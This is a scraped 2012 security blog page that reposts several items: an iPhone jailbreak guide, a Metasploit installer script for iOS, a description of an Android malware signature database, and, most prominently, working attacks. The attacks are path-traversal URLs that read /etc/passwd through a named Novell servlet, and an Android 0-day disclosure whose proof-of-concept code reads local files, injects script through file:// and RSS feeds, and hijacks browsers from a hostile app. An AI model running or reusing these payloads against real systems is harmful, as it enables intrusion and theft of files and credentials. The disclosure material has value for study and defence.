http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.jpg|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=2
[48]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.html|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=2
[49]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.css|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=2
[50]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.php|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=2
[51]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.txt|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=2
[52]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.inc|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=2
[53]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.png|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=2
[54]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=//../../../../../../../../etc/passwd|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=2
[55]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=//../../../../../../../../etc/passwden|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=2
[56]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=2

Source: http://seclists.org/fulldisclosure/2012/Feb/142

If you like my blog, Please Donate Me

Feb 8, 2012

Howto: Jailbreak iPhone iOS 5

Now that iOS 5.0.1 is available for download, we knew it was only a matter of days before a Jailbreak would be available for the new iOS. And we didn’t have long to wait. A tethered jailbreak version of RedSn0w 0.9.9b8. Is now available for download. For those of you who wish to wait for an untethered jailbreak, keep in mind that the jailbreak may not be available in the near future.
Keep in mind that once you jailbreak your iPhone from iOS5, you may have no way of downgrading your iOS back to an earlier version so make sure to backup everything on your iPhone first before you jailbreak it.
How to Jailbreak iOS 5.0.1
Note: You will need iOS 5.0 firmware (download here) to jailbreak with RedSn0w 0.9.9b8.
Step 1: Install 5.0.1 Final.
Step 2: Open RedSn0w 0.9.9b8 (download here) and select Extras > Specify Firmware > then point it to the iOS 5.0 firmware IPSW.
Step 3: Go back to the main screen of RedSn0w and place your device into DFU mode. Click Jailbreak, and then select Install Cydia.
Step 4: Your device should then jailbreak, but note that your Cydia icon will be white because it is a tethered jailbreak. To boot tethered you will need to place your device into DFU mode again.
Step 5: From the main RedSn0w page, select Extras > Specify Firmware > and point it to the iOS 5.0 IPSW.
Step 6: Choose “Just Boot” from RedSn0w’s Extras menu, and it will perform a tethered boot.
iOS 5.0.1 Final should now be fully jailbroken. If you’re in need of a more in-depth RedSn0w guide, venture over to the RedSn0w page.


Source: http://koresecure.com/2011/11/11/how-to-jailbreak-iphone-ios-5/

If you like my blog, Please Donate Me

Android Multiple Vulnerabilities By 80vul.com

Android  Multiple  Vulnerabilities 

Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2012/2/8
References: http://www.80vul.com/android/android-0days.txt


Ph4nt0m Webzine 0x06 has been released[http://www.80vul.com/webzine_0x06/],
there three papers on the android application security about the development environment,browser security, inter-application communication.And published a lot of 0days:

[0day-NO.0] android-webkit local cross-domain vulnerability

android-webkit allow local html files cross any http domain and the local file.demo:

<script>
var request = false;
        if(window.XMLHttpRequest) {
            request = new XMLHttpRequest();
            if(request.overrideMimeType) {
                request.overrideMimeType('text/xml');
            }
        } else if(window.ActiveXObject) {
            var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 
            'Microsoft.XMLHTTP', 
            'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 
            'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
            for(var i=0; i<versions.length; i++) {
                try {
                    request = new ActiveXObject(versions[i]);
                } catch(e) {}
            }
        }
               
xmlhttp=request;

//xmlhttp.open("GET", "file://///default.prop", false);
//xmlhttp.open("GET", "http://www.80vul.com/", false);
xmlhttp.send(null);
var ret = xmlhttp.responseText;

alert(ret);
</script>

[0day-NO.1] android-webkit cross-protocol vulnerability

this vul allow cross to the file protocol from http. demo:

<iframe name=f src="location.php" ></iframe> 
<script> 
function init(){ 
  f.location = "file:///default.prop"; 
} 
setTimeout(init,5000) 
</script> 

location.php codz:
<?php
header("Location:file:///80vul.com");
?>

[0day-NO.2] android-webkit file:// protocol xss vulnerability

ON android-webkit File:// protocol, the lack of filtering on the directory and file name,Lead to cross-site scripting attacks. demo:

visit this : file:///80vul.com/<script>alert(1);</script> 

[0day-NO.3] android-browser/firefox auto download the file vulnerability

android-browser/firefox Handle the Content-Disposition: attachment, lack of safety tips.So through this vul allows users to automatically download the evil html file to the local directory.

test this code:

<? 
//autodown.php
header("Content-Disposition: attachment:filename=autodown.htm"); 
$data=<<<android_xss_go
<script>alert(/xss/);</script>
android_xss_go;
print $data;
?>

the local file name and the path:

android 1.x --> /sdcard/download/autodown.html
android 2.x-3.x --> /sdcard/download/autodown.htm
android 4.0 --> /sdcard/download/autodown.php
firefox  --> /sdcard/download/autodown.php

So,Let's play a jigsaw puzzle:

POC[1]:
//[0day-NO.1]+[0day-NO.2]
<iframe name=f src="location.php" ></iframe> 
<script> 
function init(){ 
  f.location = "file:///ssss<sc"+"ript>alert(1);</sc"+"ript>/";
} 
setTimeout(init,5000) 
</script> 

POC[2]:
//[0day-NO.1]+[0day-NO.3]
<meta http-equiv="refresh" content="0;URL=autodown.php"/> 
<iframe name=f src="location.php" ></iframe> 
<script> 
function init(){ 
  f.location = "file:///sdcard/Download/autodown.htm"; 
} 
setTimeout(init,5000) 
</script> 

Now ,We can execute arbitrary js code on the local domain, and we can cross any http domain and the local file used [0day-NO.0].

and go on ...

[0day-NO.4] webview.loadDataWithBaseURL() cross-protocol vulnerability

By controlling the second argument of webview.loadDataWithBaseURL(),can cross the file:// protocol use javascript,like <script>window.location='file://///default.prop';</script> .so the dome apk demo:

        WebView webview;
        webview = (WebView) findViewById(R.id.webview);
        webview.getSettings().setJavaScriptEnabled(true);
        webview.setWebChromeClient(new WebChromeClient());
        String data="80vul<script>window.location='file://///default.prop';</script>";
        webview.loadDataWithBaseURL("http://www.baidu.com/", data, "text/html", "utf-8", null);


[0day-NO.5] com.htc.googlereader XSS vulnerability

com.htc.googlereader is an app on HTC Mobile [G10], there is a xss vul on this app, then Decompilation and Found this codz:

        label399: String str = this.mHeadlineShown.getSummary();
        if (str.trim().contains("<iframe"))
        {
          this.mWebView.loadData(str, "text/html", "utf-8");
          break label246;
        }
        this.mWebView.loadDataWithBaseURL("http://", str, "text/html", "utf-8", null);
        break label246;
        
the "str" have no filter and  can be controlled by evil RSS:


        <item>
            <guid>http://www.80vul.com</guid>
            <title>0day-NO.5</title>
            <link>http://www.80vul.com</link>
            <description><![CDATA[aa&lt;script src=&apos;http://www.80vul.com/xss.js&apos;&gt;&lt;/script&gt;]]></description>
            <dc:creator>80vul</dc:creator>
            <category>anddoid</category>
            <pubDate>Sun, 04 Sep 2011 13:01:40 -0500</pubDate>
        </item>

When  opens the unread status of the rss, u can get the XSS vul. and this is mWebView.loadDataWithBaseURL(),so can cross file:// by [0day-NO.4].


[0day-NO.6] Some Browsers for android Cross-Application Scripting Vulnerability

the evil app can cross browser and execute arbitrary js code on the local domain. the demo app codz:

//codz base on http://blog.watchfire.com/files/advisory-android-browser.pdf
package com.x;
//opera 
//com.opera.browser com.opera.Opera

//firefox 
//org.mozilla.firefox org.mozilla.firefox.App

//android
//com.android.browser com.android.browser.BrowserActivity

import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

public class TesttestActivity extends Activity {
 static final String mPackage = "com.android.browser";
 static final String mClass = "com.android.browser.BrowserActivity";
 static final String gomPackage = "com.opera.browser";
 static final String gomClass = "com.opera.Opera";
 static final String mUrl = "http://www.80vul.com/autodown.php";
 static final int mSleep = 15000;
 @Override
 public void onCreate(Bundle savedInstanceState) {
 super.onCreate(savedInstanceState);
 setContentView(R.layout.main);
 startBrowserActivity(mUrl);
 try {
 Thread.sleep(mSleep);
 }
 catch (InterruptedException e) {}
 startBrowserActivitygo("file:///sdcard/Download/g.htm");
 }
 private void startBrowserActivity(String url) {
 Intent res = new Intent("android.intent.action.VIEW");
 res.setComponent(new ComponentName(mPackage,mClass));
 res.setData(Uri.parse(url));
 startActivity(res);
 }
 private void startBrowserActivitygo(String url) {
 Intent res = new Intent("android.intent.action.VIEW");
 res.setComponent(new ComponentName(gomPackage,gomClass));
 res.setData(Uri.parse(url));
 startActivity(res);
 }
}


Source: http://www.80vul.com/android/android-0days.txt

If you like my blog, Please Donate Me

Feb 7, 2012

Installer Script For Metasploit on iOS5 by Khalil Ounis



#/bin/bash
# Author: Khalil Ounis
# Description: iDevice Metasploit Auto Installer Script Version 3
# Web Site: www.89geek.com

ROOT_UID=0
VARDIR=/private/var/
CURRDIR=`pwd`
E_NODIR=1
E_CANTRESOLVE=4
E_NOTROOT=67
E_CMDNOTFOUND=127

clear

[ "$UID" != "$ROOT_UID" ] && {
 echo "This script must be run as root";
 exit $E_NOTROOT;
}

echo "Metasploit Installer Script V3 - By Khalil Ounis"
echo "For iDevices - www.89geek.com"
echo "Press any key to continue..."
read

echo -n "Removing ruby and rubygems... "
aptitude -y remove ruby rubygems &>/dev/null
[ $? -eq $E_CMDNOTFOUND ] && {
 echo "aptitude not installed, use cydia to install it.";
 echo "installation aborted.";
 exit $E_CMDNOTFOUND;
}

echo "Done"

cd $VARDIR &> /dev/null
[ $? -eq $E_NODIR ] && {
 echo "Can't access to $VARDIR, check your folder.";
 exit $E_NODIR;
}

wget &>/dev/null
[ $? -eq $E_CMDNOTFOUND ] && {
 echo "wget not installed. Installing wget";
 aptitude -y wget &>/dev/null;
}

echo -n "Download ruby_1.8.6-p111-5_iphoneos-arm.deb... "
[ -f ruby_1.8.6-p111-5_iphoneos-arm.deb ] && rm ruby_1.8.6-p111-5_iphoneos-arm.deb &>/dev/null

wget http://apt.saurik.com/dists/tangelo-0.9/main/binary-iphoneos-arm/debs/ruby_1.8.6-p111-5_iphoneos-arm.deb &>/dev/null

[ $? -eq $E_CANTRESOLVE ] && {
 echo "Can't access saurik server, check your connection.";
 echo "installation aborted";
 exit $E_CANTRESOLVE;
}

echo "Done"

echo -n "Download rubygems_1.2.0-3_iphoneos-arm.deb... "
[ -f rubygems_1.2.0-3_iphoneos-arm.deb ] && rm rubygems_1.2.0-3_iphoneos-arm.deb &>/dev/null

wget http://apt.saurik.com/dists/tangelo-0.9/main/binary-iphoneos-arm/debs/rubygems_1.2.0-3_iphoneos-arm.deb &>/dev/null

[ $? -eq $E_CANTRESOLVE ] && {
 echo "Can't access to saurik server, check your connection.";
 echo "installation aborted";
 exit $E_CANTRESOLVE;
}

echo "Done"

echo -n "Download framework-3.5.2.tar.bz2... "
[ -f framework-3.5.2.tar.bz2 ] && rm framework-3.5.2.tar.bz2 &>/dev/null
wget http://updates.metasploit.com/data/releases/framework-3.5.2.tar.bz2 &>/dev/null

[ $? -eq $E_CANTRESOLVE ] && {
 echo "Can't access metasploit server, check your connection.";
 echo "installation aborted";
 exit $E_CANTRESOLVE;
}

echo "Done"

echo -n "Istalling ruby... "
dpkg -i ruby_1.8.6-p111-5_iphoneos-arm.deb &>/dev/null

[ $? -ne 0 ] && {
 echo "Problem occurred, installation aborted";
 exit 1;
}

echo "Done"

echo -n "Installing rubygems... "
dpkg -i rubygems_1.2.0-3_iphoneos-arm.deb &>/dev/null

[ $? -ne 0 ] && {
 echo "Problem occurred, installation aborted";
 exit 1;
}

echo "Done"

echo -n "Decompressing framework-3.5.2.tar.bz2... "
tar -jxf framework-3.5.2.tar.bz2
[ $? -ne 0 ] && {
 echo "Problem occurred while decompressing archive.";
 echo "installation aborted";
 exit 1;
}

echo "Done"

echo -n "Removing downlaoded files... "
rm framework-3.5.2.tar.bz2 ruby_1.8.6-p111-5_iphoneos-arm.deb rubygems_1.2.0-3_iphoneos-arm.deb &>/dev/null
[ $? -ne 0 ] && echo "Can't remove downloaded files, step skipped!"
echo "Done"

echo -n "Creating Links... "
cd /bin
[ $? -eq $E_NODIR ] && {
 echo "Can't access to bin directory";
 echo "installation aborted";
 exit $E_NODIR;
}

ln -s /private/var/msf3/msfconsole ./msfconsole
ln -s /private/var/msf3/msfcli ./msfcli

echo "Done"
echo "Done... Metasploit Installed"

cd $CURRDIR

exit 0

For Update 
1. aptitude install subversion
2. cd /var/msf3
3. svn update 
Source: http://www.dis9.com/ios5-0-1-on-perfect-install-metasploit.html

If you like my blog, Please Donate Me

Feb 5, 2012

Open Source database of android malware

If you want to see full list of android malware, please go to the source.

This database is open source and anybody can send comments in order to add new links to analysis articles, to apply modifications on signatures or to add new signatures (it's is done on our free time, of course our free time is limited, so if you want to help, you are welcome !).

email: androguard (at) t0t0 (dot) fr

Submit malware

You can also send us samples in order to add them to the database, and moreover sometimes we request samples to analyze and add them in the database.

Submit information

You can send us more information about a malware, and sometimes we request information (INFORMATION) on a specific malware because we don't have found anything on internet.

Malware name

We used common names for malware, so if you have know others names for a malware, please contact us.

Malware detection

You can test if an application contains a malware in the androguard example database, or add/remove new signatures. So for few malwares, we created a signature to detect them. For now, we use similarity distance and clustering to search a signature in an application. For more information go to this page.
This database is an example of how it's possible to use androguard in order to detect parts of your application in another one.
If you are interesting about android malwares, it's possible to download few of them on the website of contagiodump or contagiominidump
On this page, you will find information about android malwares. Firstly, you will have links of different analysis of each malware, and some requests. Next you can find which techniques have been used to add the sample in androguard database, but it's more interesting to check directly the signature. Of course, by using the similarity distance, we can detect variants of each malware. 

Source: https://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares


If you like my blog, Please Donate Me
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |